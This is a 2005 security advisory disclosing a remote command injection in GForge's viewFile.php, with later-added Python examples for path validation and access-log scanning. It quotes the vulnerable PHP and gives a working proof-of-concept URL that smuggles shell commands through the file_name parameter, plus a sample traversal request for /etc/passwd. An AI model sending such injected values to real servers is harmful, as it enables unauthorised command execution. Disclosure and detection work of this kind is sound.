gforgeexec.txt

Reported 14 Aug 2005 by Filippo Spike Morelli. Type: packetstorm. Source: packetstormsecurity.com

Vulnerability in Gforge before version 4.0 allows arbitrary command execution remotely.

Advisory

--------------------------------------------------------------------------  
Vendor : Gforge (http://gforge.org)  
Product : gforge  
Affected versions : < 4.0  
Bug fixed : >= 4.0 & Debian pkg 3.1-30  
Vulnerability : Input validation flaw  
Problem-Type : remote  
Severity : High, arbitrary command execution  
  
Author : Filippo Spike Morelli  
--------------------------------------------------------------------------  
  
  
--------------------------------------------------------------------------  
Background  
--------------------------------------------------------------------------  
  
GForge helps you manage the entire development life cycle.  
  
GForge has tools to help your team collaborate, like message forums and  
mailing lists; tools to create and control access to Source Code Management  
repositories like CVS and Subversion. GForge automatically creates a  
repository and controls access to it depending on the role settings of the  
project.  
  
--------------------------------------------------------------------------  
Bug Description  
--------------------------------------------------------------------------  
The scm component shipped with GForge has a bug in the viewFile.php script.  
This script is supposed to serve a file info request, outputting the file's  
history, diffs, and all the other relevant information stored in the repository.  
The file_name parameter is not validated, so a properly crafted URL leads to  
arbitrary command execution under the uid the web server runs as.  
  
Files involved:  
$GFORGE/www/scm/viewFile.php  
$GFORGE/common/include/cvsweb/RCSHandler.class  
  
The problem is that the "file_name" URL parameter is not validated before use.  
  
$GFORGE/www/scm/viewFile.php (excerpt, as shipped before 4.0):  

```php
// ...
if($allow)
{
    $DHD = new DirectoryHandler();
    $FHD = new FileHandler();
    $RCH = new RCSHandler();

    $CVSROOT = $GLOBALS['sys_cvsroot_dir'].$cvsroot;
    // $file_name comes straight from the URL; nothing is checked here
    $DIRNAME = ($file_name != "")?"$file_name":"";
    $DIRNAME = $CVSROOT.$DIRNAME;
    // ...
    $RCSFile = $DIRNAME.",v";
    switch($view_action)
    {
        case "l":
            if(false === $RCH->getRCSLog($RCSFile))
                echo("Error: ".$RCH->getError());
    // ...
```
  
$GFORGE/common/include/cvsweb/RCSHandler.class  
The RCSHandler class manages the RCS log and diffs for the requested file,  
and it is there that the injected command is actually executed.  

```php
// ...
function getRCSLog($RCSFILE,$REV="all")
{
    $rev = "";
    if($REV != "all")
        $rev = "-r$REV";

    $file = $this->generateTemp();
    // $RCSFILE is interpolated, unescaped, into a shell command line
    $cmd = "rlog $rev $RCSFILE > $file";
    if(false === ($result = system($cmd)))   // <-- the string reaches /bin/sh here
    {
        $this->setError("Could not execute '$cmd'");
        return false;
    }
// ...
```
  
system() hands $cmd to the shell, so whatever was injected into $RCSFILE is executed.  
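As an added example (not GForge's code and not part of the advisory), the following Python shows the validation that viewFile.php lacked: confine file_name to the CVS root with an allowlist of path segments, and hand rlog an argument vector instead of a shell command string. The cvsroot value, the function names and the sample inputs are constructed for this example; the PHP counterparts would be a realpath()-style containment check plus escapeshellarg(), or better an execution path that never touches /bin/sh.

```python
"""Server-side validation for a repository path taken from a URL parameter.

Added example (not GForge code): the checks below are what viewFile.php
should have done before passing $file_name to getRCSLog(). Function names,
the CVSROOT value and the sample inputs are constructed for this example.
"""
import os
import re
import subprocess
from typing import List

# Constructed value; GForge reads this from $GLOBALS['sys_cvsroot_dir'].
CVSROOT = "/var/lib/gforge/chroot/cvsroot/proj"

# Allowlist for one path segment: ordinary file-name characters only.
# Newlines, ';', '|', '&', '`', '$', quotes and spaces never match, and a
# leading '-' is rejected so a segment can never become an rlog option.
_SEGMENT_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*$")


def resolve_rcs_file(file_name: str, cvsroot: str = CVSROOT) -> str:
    """Return the ',v' file for file_name, or raise ValueError.

    Rejects empty names, control characters (the %0A in the advisory's
    request), absolute paths, '.' / '..' segments, and anything whose
    normalized form escapes cvsroot.
    """
    if not file_name:
        raise ValueError("empty file_name")
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in file_name):
        raise ValueError("control character in file_name")
    if file_name.startswith("/"):
        raise ValueError("absolute path not allowed")
    for seg in file_name.split("/"):
        if seg in ("", ".", "..") or not _SEGMENT_RE.match(seg):
            raise ValueError(f"bad path segment {seg!r}")
    candidate = os.path.normpath(os.path.join(cvsroot, file_name))
    # Defence in depth: even after the segment checks, confirm containment.
    if os.path.commonpath([cvsroot, candidate]) != os.path.normpath(cvsroot):
        raise ValueError("path escapes cvsroot")
    return candidate + ",v"


def rlog_argv(rcs_file: str, rev: str = "all") -> List[str]:
    """Build rlog's argument vector. No shell is involved, so no quoting is needed."""
    argv = ["rlog"]
    if rev != "all":
        if not re.fullmatch(r"[0-9]+(\.[0-9]+)*", rev):
            raise ValueError("revision must look like 1.2.3")
        argv.append(f"-r{rev}")
    argv.append(rcs_file)
    return argv


def get_rcs_log(file_name: str, rev: str = "all") -> str:
    """Counterpart of RCSHandler::getRCSLog() with no shell in the path."""
    argv = rlog_argv(resolve_rcs_file(file_name), rev)
    result = subprocess.run(argv, capture_output=True, text=True, check=False)
    if result.returncode != 0:
        raise RuntimeError(f"rlog failed: {result.stderr.strip()}")
    return result.stdout


if __name__ == "__main__":
    # Constructed inputs: one legitimate name, the advisory's payload, a traversal.
    for name in ["module/file.c", "\nuname -a;id;w\n", "../../../etc/passwd"]:
        try:
            print(repr(name), "->", rlog_argv(resolve_rcs_file(name)))
        except ValueError as exc:
            print(repr(name), "-> rejected:", exc)
```

The allowlist does the real work; the commonpath check is kept only as a second line of defence in case the segment rules are ever loosened. Because rlog receives an argv list, a file name that somehow passed validation still could not grow extra shell commands.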
  
  
--------------------------------------------------------------------------  
PoC  
--------------------------------------------------------------------------  
  
The injected command used for this analysis is "uname -a;id;w".  
  
```text
gforge/xxxx/xx/xx/gforge.log:xxx.xxx.xxx.xxx [xx/xxx/xxxx:xx:xx:xx +xxxx]
"GET /scm/viewFile.php?group_id=11&file_name=%0Auname%20-a;id;w%0a
HTTP/1.1" 200 2977
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Maxthon;
.NET CLR 1.1.4322)"
```
  
----- "file_name=%0Auname%20-a;id;w%0a" -----  
%0a (also written %0A) = URL-encoded line feed, shown below as <return>.  
%20 = URL-encoded space.  
---> "file_name=<return>uname -a;id;w<return>"  
  
Looking at the viewFile.php source code:  
$DIRNAME = ($file_name != "")?"$file_name":"";  
so $DIRNAME = <return>uname -a;id;w<return>  
$RCSFile = $DIRNAME.",v";  
so $RCSFile = <return>uname -a;id;w<return>,v  
...  
$cmd = "rlog $rev $RCSFILE > $file";  
so $cmd = rlog all <return>uname -a;id;w<return>,v > $file  
  
if(false === ($result = system($cmd)))  
and the shell then executes, line by line:  
  
1. rlog all, which returns an error because the path does not exist  
2. <return>  
3. uname -a;id;w  
4. <return>  
5. and finally the last part of the string, ",v", which produces the  
error message "sh: ,v: command not found"  
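For the detection side, here is an added Python example (not part of the advisory) that scans web-server access logs in the common combined format for viewFile.php requests whose file_name parameter carries line terminators, shell metacharacters or directory traversal. The log lines, client addresses and timestamps are constructed; the first entry reproduces the request shape shown above.

```python
"""Scan access logs for injection attempts against /scm/viewFile.php.

Added example, not part of the advisory or of GForge. The log lines,
client addresses and timestamps below are constructed.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Apache/NCSA combined log format; the trailing referrer/user-agent
# fields are not needed for the decision, so match() ignores them.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Things that never belong in a repository path: line terminators (the
# %0A of the original request), shell separators, command substitution,
# quoting, redirection, and parent-directory traversal.
SUSPICIOUS = re.compile(r'''[\n\r;|&`$"'<>]|\.\./''')

# Constructed sample log: one injection attempt, one legitimate request,
# one traversal attempt, one unrelated page.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Aug/2005:10:12:01 +0200] "GET /scm/viewFile.php?group_id=11&file_name=%0Auname%20-a;id;w%0a HTTP/1.1" 200 2977 "-" "Mozilla/4.0"
203.0.113.7 - - [14/Aug/2005:10:12:05 +0200] "GET /scm/viewFile.php?group_id=11&file_name=module/main.c&view_action=l HTTP/1.1" 200 1302 "-" "Mozilla/4.0"
198.51.100.9 - - [14/Aug/2005:10:13:40 +0200] "GET /scm/viewFile.php?group_id=11&file_name=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 87 "-" "curl/7.12"
198.51.100.9 - - [14/Aug/2005:10:14:00 +0200] "GET /index.php HTTP/1.1" 200 5120 "-" "curl/7.12"
"""


def query_params(query):
    """Split a raw query string without relying on parse_qs, whose
    treatment of ';' as a separator differs between Python versions."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def find_injections(log_text):
    """Return one finding per viewFile.php request with a hostile file_name."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        url = urlsplit(m["target"])
        if not url.path.endswith("/scm/viewFile.php"):
            continue
        for value in query_params(url.query).get("file_name", []):
            hit = SUSPICIOUS.search(value)
            if hit:
                findings.append({
                    "host": m["host"],
                    "time": m["time"],
                    "file_name": value,          # decoded, as the script saw it
                    "matched": hit.group(0),
                    "status": int(m["status"]),
                })
    return findings


if __name__ == "__main__":
    for f in find_injections(SAMPLE_LOG):
        print(f"{f['time']} {f['host']} status={f['status']} "
              f"matched={f['matched']!r} file_name={f['file_name']!r}")
```

Decoding happens once, on the value the server would have used, so the rule is applied to what reached the shell rather than to the encoded bytes on the wire. A 200 status on a flagged request is worth noting in triage: the vulnerable script returns 200 even when rlog fails, so status alone says nothing about whether the injected command ran.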
  
--------------------------------------------------------------------------  
Solution  
--------------------------------------------------------------------------  
  
The vendor has been contacted and promptly worked on a fix. At the time of  
writing, the Debian package available in Sid (gforge 3.1-30) has been fixed.  
As a temporary measure the scm component can be disabled; otherwise upgrade  
to the latest version.  
  
  
regards,  
  
--   
Filippo Spike Morelli - Miu-ft System Administrator  
....................................  
.... follow the white rabbit ....  
... wait no, follow alice, she's so cute...  
